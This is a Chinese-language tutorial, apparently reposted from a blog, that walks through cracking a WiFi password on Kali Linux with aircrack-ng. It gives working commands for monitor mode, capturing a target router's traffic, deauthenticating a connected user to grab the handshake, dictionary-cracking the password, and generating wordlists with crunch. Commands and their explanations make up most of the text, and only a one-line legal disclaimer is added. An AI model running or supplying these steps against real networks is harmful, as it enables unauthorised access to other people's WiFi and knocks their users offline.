平臺及工具:
linux:kali平臺
aircrack - ng 工具
免驅監(jiān)聽網卡
詳細操作
1.首先啟動kali,插入網卡,輸入ifconfig查看kali是否檢測到監(jiān)聽網卡,注意監(jiān)聽網卡要免驅動的。
ifconfig //查看自身網卡信息
?如圖,看到wlan0就代表kali成功檢測到監(jiān)聽網卡啦。
2.在啟動網卡的監(jiān)聽模式之前一定要殺死進程,否則將會監(jiān)聽不到附近的WiFi,執(zhí)行下面命令殺死進程。
airmon-ng check kill //殺死有關進程
3.殺死進程以后,執(zhí)行以下命令開啟網卡的監(jiān)聽模式。
airmon-ng start wlan0 //啟動網卡的監(jiān)聽模式
?4.開啟網卡的監(jiān)聽模式之后,執(zhí)行命令監(jiān)聽附近WIFI信息,監(jiān)聽到需要的信息之后ctrl+c停止。
airodump-ng wlan0mon //監(jiān)聽周圍的無線WiFi
?5.執(zhí)行以下命令查看監(jiān)聽到的路由器的詳細信息。
airodump-ng wlan0mon -c 1 --bssid 50:BD:5F:8B:26:FE -w ~/wlan0mon
對上述參數(shù)的解釋
1.-c:接的是上圖中的CH,代表信道。
2.--bssid:路由器的MAC地址。
3.PWR:信號強度,數(shù)值越大代表信號越強。
4.ENC:使用的加密方式。
5.AUTH:代表認證方式。
6.ESSID:代表WIFI名字。
7.-w ~/wlan0mon:將抓取的流量包保存到根目錄下并命名為wlan0mon。
輸入上述命令后的效果如上圖所示,會對指定的路由器進行監(jiān)控,第一行為WIFI主機,第二行為連接了該WIFI的用戶。
6.執(zhí)行攻擊命令斷開該用戶與WIFI主機之間的連接。
aireplay-ng -0 50 -a 50:BD:5F:8B:26:FE -c 2C:D2:6B:CA:54:8D wlan0mon
?-0 表示發(fā)起默認的攻擊,之后接的數(shù)字代表攻擊次數(shù),上圖是攻擊50次,如果想進行斷網攻擊就只用填寫0,默認一直攻擊。
-a 指定的無線路由器的BSSID
-c 指定斷開連接的用戶的MAC地址(上圖中為STATION)
如此便可以獲得握手包啦。
7.執(zhí)行命令跑密碼本獲得WiFi密碼。
aircrack-ng wlan0mon-01.cap -w password.txt
wlan0mon-01.cap 代表握手包
password.txt 代表密碼本
附:密碼本的生成和導出方法。
crunch 9 9 -p 123 321 111 333
解釋一下”-p”之前是幾位數(shù)密碼,需要注意我這里寫了兩個9,因為這其實是個范圍,相當與9位~9位,如果是不確定幾位,就是這是個范圍,比方說是4~7位,就寫
crunch 4 7 -p 123 321 111 333
如果要導出到根下的password.txt,就寫?文章來源:http://www.zghlxwxcb.cn/news/detail-579491.html
crunch 4 7 -p 123 321 111 333 > /password.txt
破解過程這里就不演示啦,最后說一句,善用技術,遵紀守法,加強網絡安全意識,此文僅供學習參考。文章來源地址http://www.zghlxwxcb.cn/news/detail-579491.html
到了這里,關于kali使用aircrack無線攻擊wifi超詳細步驟(包含監(jiān)聽網卡啟動,獲得握手包,密碼本生成)的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!